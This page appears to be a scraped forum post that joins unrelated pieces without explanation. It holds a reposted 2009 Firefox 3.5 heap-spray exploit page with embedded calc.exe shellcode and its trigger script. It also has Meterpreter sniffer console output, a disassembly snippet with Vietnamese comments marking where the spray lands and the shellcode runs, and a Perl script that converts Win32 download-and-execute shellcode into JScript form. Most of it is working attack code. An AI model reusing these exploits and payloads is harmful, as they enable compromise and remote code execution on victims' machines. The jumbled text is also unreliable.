0-day in Mozilla Firefox 3.5 - critical

<html> <head> <title>Firefox 3.5 Vulnerability</title> Firefox 3.5 Heap Spray Vulnerabilty </br> Author: SBerry aka Simon Berry-Byrne </br> Thanks to HD Moore for the insight and Metasploit for the payload <div id="content"> <p> <FONT> </FONT> </p> <p> <FONT>Loremipsumdoloregkuw</FONT></p> <p> <FONT>Loremipsumdoloregkuwiert</FONT> </p> <p> <FONT>Loremikdkw </FONT> </p> </div> <script language=JavaScript> /* Calc.exe */ var shellcode = unescape("%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u0001%u0800" + "%u75C0%uFE0F%u1285%u0001%uE800%u001A%u0000%uC009%u1074%u0A6A" + "%u858D%u0114%u0000%uFF50%u0695%u0001%u6100%uC031%uC489%uC350" + "%u8D60%u02BD%u0001%u3100%uB0C0%u6430%u008B%u408B%u8B0C%u1C40" + "%u008B%u408B%uFC08%uC689%u3F83%u7400%uFF0F%u5637%u33E8%u0000" + "%u0900%u74C0%uAB2B%uECEB%uC783%u8304%u003F%u1774%uF889%u5040" + "%u95FF%u0102%u0000%uC009%u1274%uC689%uB60F%u0107%uEBC7%u31CD" + "%u40C0%u4489%u1C24%uC361%uC031%uF6EB%u8B60%u2444%u0324%u3C40" + "%u408D%u8D18%u6040%u388B%uFF09%u5274%u7C03%u2424%u4F8B%u8B18" + "%u205F%u5C03%u2424%u49FC%u407C%u348B%u038B%u2474%u3124%u99C0" + "%u08AC%u74C0%uC107%u07C2%uC201%uF4EB%u543B%u2824%uE175%u578B" + "%u0324%u2454%u0F24%u04B7%uC14A%u02E0%u578B%u031C%u2454%u8B24" + "%u1004%u4403%u2424%u4489%u1C24%uC261%u0008%uC031%uF4EB%uFFC9" + "%u10DF%u9231%uE8BF%u0000%u0000%u0000%u0000%u9000%u6163%u636C" + "%u652E%u6578%u9000"); /* Heap Spray code */ oneblock = unescape("%u0c0c%u0c0c"); var fullblock = oneblock; while (fullblock.length<0x60000) { fullblock += fullblock; } sprayContainer = new Array(); for (i=0; i<600; i++) { sprayContainer[i] = fullblock + shellcode; } var searchArray = new Array() function escapeData(data) { var i; var c; var escData=''; for(i=0;i<data.length;i++) { c=data.charAt(i); if(c=='&' || c=='?' || c=='=' || c=='%' || c==' ') c = escape(c); escData+=c; } return escData; } function DataTranslator(){ searchArray = new Array(); searchArray[0] = new Array(); searchArray[0]["str"] = "blah"; var newElement = document.getElementById("content") if (document.getElementsByTagName) { var i=0; pTags = newElement.getElementsByTagName("p") if (pTags.length > 0) while (i<pTags.length) { oTags = pTags[i].getElementsByTagName("font") searchArray[i+1] = new Array() if (oTags[0]) { searchArray[i+1]["str"] = oTags[0].innerHTML; } i++ } } } function GenerateHTML() { var html = ""; for (i=1;i<searchArray.length;i++) { html += escapeData(searchArray[i]["str"]) } } DataTranslator(); GenerateHTML() </script> </body> </html> <html><body></body></html> # milw0rm.com [2009-07-13]

meterpreter > help ……. Sniffer Commands ================ Command Description ------- ----------- sniffer_dump Retrieve captured packet data sniffer_interfaces list all remote sniffable interfaces sniffer_start Capture packets on a previously opened interface sniffer_stats View statistics of an active capture sniffer_stop Stop packet captures on the specified interface meterpreter > sniffer_interfaces 1 - 'VMware Accelerated AMD PCNet Adapter' ( type:0 mtu:1514 usable:true dhcp:true wifi:false ) meterpreter >

0038695C 83E1 F8 AND ECX,FFFFFFF8 0038695F 8B11 MOV EDX,DWORD PTR DS:[ECX] 00386961 8B02 MOV EAX,DWORD PTR DS:[EDX] ; <-- EAX bị sửa đổi ở đây 00386963 83C3 FC ADD EBX,-4 00386966 53 PUSH EBX 00386967 6A 00 PUSH 0 00386969 51 PUSH ECX 0038696A 8B48 20 MOV ECX,DWORD PTR DS:[EAX+20] ; <-- Dùng kỹ thuật heap spray để chèn đoạn padding & shellcode vào vùng bộ nhớ eax + 20. 0038696D 57 PUSH EDI 0038696E FFD1 CALL ECX ; <-- Shellcode được gọi từ đây

#!/usr/bin/perl

use strict;

# Win32 Download & Execute Shellcode / Translating shellcode To JScript shellcode

# coded by elazer (elazarb [at] earthlink.net)


# linux Usage:
# bt shellcode # ./jscript.pl %uc933%ue983%ud9b8%ud9ee%u2474%u5bf4%u7381%u1713%uc161%u8392%ufceb%uf4e2%u0beb%udf2a%u98ff%u6d3e%u01e8%ufe4a%u4533%ud74a%uea2b%u97bd%u606f%u192e%u7958%ucd4a%u6037%udb2a%u559c%u934a%u50f9%u0b01%ue5bb%ue601%ua010%u9f0b%ua316%u662a%u352c%ubae5%u8462%ucd4a%u6033%uf42a%u6d9c%u198a%u7d48%u79c0%u4d14%u1b4a%u457b%uf3dd%u50d4%uf61a%u229c%u19f1%u6d57%ue24a%ucc0b%ud24a%u3f1f%u1ca9%u6f59%uc22d%ub7e8%uc1a7%u0971%ua0f2%u167f%ua0b2%u3548%u423e%uaa7f%u6e2c%u312c%u443e%ue848%uf424%u8c96%u90c9%u0b42%u6dc3%u09c7%u9b18%ucce2%u6d96%u32c1%uc192%u2244%ud192%u9e44%ufa11%uc9d7%ud1c0%u0971%u3cc9%u3271%u7348%u0982%u6b2d%u01bd%u6d96%u0bc1%uc3d1%u9e42%uf411%u057d%ufaa7%u0c74%uc2ab%u484e%u1b0d%u0bf0%u1b85%u50f5%u6101%uf4bd%u6f48%u23e9%u6cec%u4d55%ue84c%uca2f%u396a%u137f%u213f%u9e01%ubab4%ub7e8%uc59a%u3045%uc390%u607d%uc390%u3042%u423e%ucc7f%u9718%u32d9%u443e%u9e7d%ua53e%ub1e8%u75a9%ua76e%u6db8%u6562%u443e%u16e8%u6d3d%u09c7%u1831%u3e13%u6d92%u9ec1%u9211

# windows Usage:
# C:\Documents and Settings\elazer\Desktop>jscript.pl %uc933%ue983%ud9b8%ud9ee%u2474%u5bf4%u7381%u1713%uc161%u8392%ufceb%uf4e2%u0beb%udf2a%u98ff%u6d3e%u01e8%ufe4a%u4533%ud74a%uea2b%u97bd%u606f%u192e%u7958%ucd4a%u6037%udb2a%u559c%u934a%u50f9%u0b01%ue5bb%ue601%ua010%u9f0b%ua316%u662a%u352c%ubae5%u8462%ucd4a%u6033%uf42a%u6d9c%u198a%u7d48%u79c0%u4d14%u1b4a%u457b%uf3dd%u50d4%uf61a%u229c%u19f1%u6d57%ue24a%ucc0b%ud24a%u3f1f%u1ca9%u6f59%uc22d%ub7e8%uc1a7%u0971%ua0f2%u167f%ua0b2%u3548%u423e%uaa7f%u6e2c%u312c%u443e%ue848%uf424%u8c96%u90c9%u0b42%u6dc3%u09c7%u9b18%ucce2%u6d96%u32c1%uc192%u2244%ud192%u9e44%ufa11%uc9d7%ud1c0%u0971%u3cc9%u3271%u7348%u0982%u6b2d%u01bd%u6d96%u0bc1%uc3d1%u9e42%uf411%u057d%ufaa7%u0c74%uc2ab%u484e%u1b0d%u0bf0%u1b85%u50f5%u6101%uf4bd%u6f48%u23e9%u6cec%u4d55%ue84c%uca2f%u396a%u137f%u213f%u9e01%ubab4%ub7e8%uc59a%u3045%uc390%u607d%uc390%u3042%u423e%ucc7f%u9718%u32d9%u443e%u9e7d%ua53e%ub1e8%u75a9%ua76e%u6db8%u6562%u443e%u16e8%u6d3d%u09c7%u1831%u3e13%u6d92%u9ec1%u9211

# your shellcode here
my $shellcode =
"\x29\xc9\x83\xe9\xb8\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xdf".
"\xfa\xe2\x72\x83\xeb\xfc\xe2\xf4\x23\x90\x09\x3f\x37\x03\x1d\x8d".
"\x20\x9a\x69\x1e\xfb\xde\x69\x37\xe3\x71\x9e\x77\xa7\xfb\x0d\xf9".
"\x90\xe2\x69\x2d\xff\xfb\x09\x3b\x54\xce\x69\x73\x31\xcb\x22\xeb".
"\x73\x7e\x22\x06\xd8\x3b\x28\x7f\xde\x38\x09\x86\xe4\xae\xc6\x5a".
"\xaa\x1f\x69\x2d\xfb\xfb\x09\x14\x54\xf6\xa9\xf9\x80\xe6\xe3\x99".
"\xdc\xd6\x69\xfb\xb3\xde\xfe\x13\x1c\xcb\x39\x16\x54\xb9\xd2\xf9".
"\x9f\xf6\x69\x02\xc3\x57\x69\x32\xd7\xa4\x8a\xfc\x91\xf4\x0e\x22".
"\x20\x2c\x84\x21\xb9\x92\xd1\x40\xb7\x8d\x91\x40\x80\xae\x1d\xa2".
"\xb7\x31\x0f\x8e\xe4\xaa\x1d\xa4\x80\x73\x07\x14\x5e\x17\xea\x70".
"\x8a\x90\xe0\x8d\x0f\x92\x3b\x7b\x2a\x57\xb5\x8d\x09\xa9\xb1\x21".
"\x8c\xb9\xb1\x31\x8c\x05\x32\x1a\x1f\x52\xe0\x17\xb9\x92\xea\x3b".
"\xb9\xa9\x6b\x93\x4a\x92\x0e\x8b\x75\x9a\xb5\x8d\x09\x90\xf2\x23".
"\x8a\x05\x32\x14\xb5\x9e\x84\x1a\xbc\x97\x88\x22\x86\xd3\x2e\xfb".
"\x38\x90\xa6\xfb\x3d\xcb\x22\x81\x75\x6f\x6b\x8f\x21\xb8\xcf\x8c".
"\x9d\xd6\x6f\x08\xe7\x51\x49\xd9\xb7\x88\x1c\xc1\xc9\x05\x97\x5a".
"\x20\x2c\xb9\x25\x8d\xab\xb3\x23\xb5\xfb\xb3\x23\x8a\xab\x1d\xa2".
"\xb7\x57\x3b\x77\x11\xa9\x1d\xa4\xb5\x05\x1d\x45\x20\x2a\x8a\x95".
"\xa6\x3c\x9b\x8d\xaa\xfe\x1d\xa4\x20\x8d\x1e\x8d\x0f\x92\x12\xf8".
"\xdb\xa5\xb1\x8d\x09\x05\x32\x72";





my $jscript =convert_shellcode($shellcode);
buffer_gen($shellcode);
print $jscript;

sub generate_char()
{
 my $wdsize = shift;
 my @alphanumeric = ('a'..'z');
 my $wd = join '',
 map $alphanumeric[rand @alphanumeric], 0..$wdsize;
  return $wd;
}

sub convert_shellcode {
        my $data = shift;
        my $mode = shift() || 'LE';
        my $code = '';

        my $idx = 0;

        if (length($data) % 2 != 0) {
                $data .= substr($data, -1, 1);
        }

        while ($idx < length($data) - 1) {
                my $c1 = ord(substr($data, $idx, 1));
                my $c2 = ord(substr($data, $idx+1, 1));
                if ($mode eq 'LE') {
                        $code .= sprintf('%%u%.2x%.2x', $c2, $c1);
                } else {
                        $code .= sprintf('%%u%.2x%.2x', $c1, $c2);
                }
                $idx += 2;
        }

        return $code;
}

sub buffer_gen(){

}

Users currently in here

1 Anonymous